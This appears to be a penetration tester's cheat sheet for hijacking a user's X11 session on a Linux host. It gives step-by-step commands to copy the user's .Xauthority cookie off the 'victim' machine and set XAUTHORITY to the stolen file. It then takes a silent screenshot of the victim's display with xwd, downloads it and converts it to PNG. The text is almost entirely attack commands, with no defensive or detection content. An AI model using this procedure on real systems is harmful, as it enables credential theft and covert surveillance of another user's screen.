X11

Files present in home directory:

.xsession, .Xauthority

Check for the LightDM user in /etc/passwd for further confirmation.

The presence of these files in a user's home directory might indicate that the user has already authenticated and possibly contain sensitive information to view.

Steps:

1) Transfer the .Xauthority file to our machine

cat .Xauthority | base64 

Then

echo 'BASE64_STRING' > /tmp/Xauthority 

or just transfer it via a python server.

2) Set the cookie by pointing the environment variable to our cookie file

export XAUTHORITY=/tmp/Xauthority 

3) (Victim machine) Check which display the user we are trying to impersonate is using

w 

4) (Victim machine) Dumps an image of an x window, to get a screenshot in its current state.

xwd 

Example command: (-root: select root window, -screen: send GetImage request to root window, -silent: Do it silently, -display: specify the server to connect to)

xwd -root -screen -silent -display :0 > /tmp/screen.xwd 

5) Download the file from the victim host to our machine

6) Convert to image format to view the screenshot

convert /tmp/screen.xwd screen.png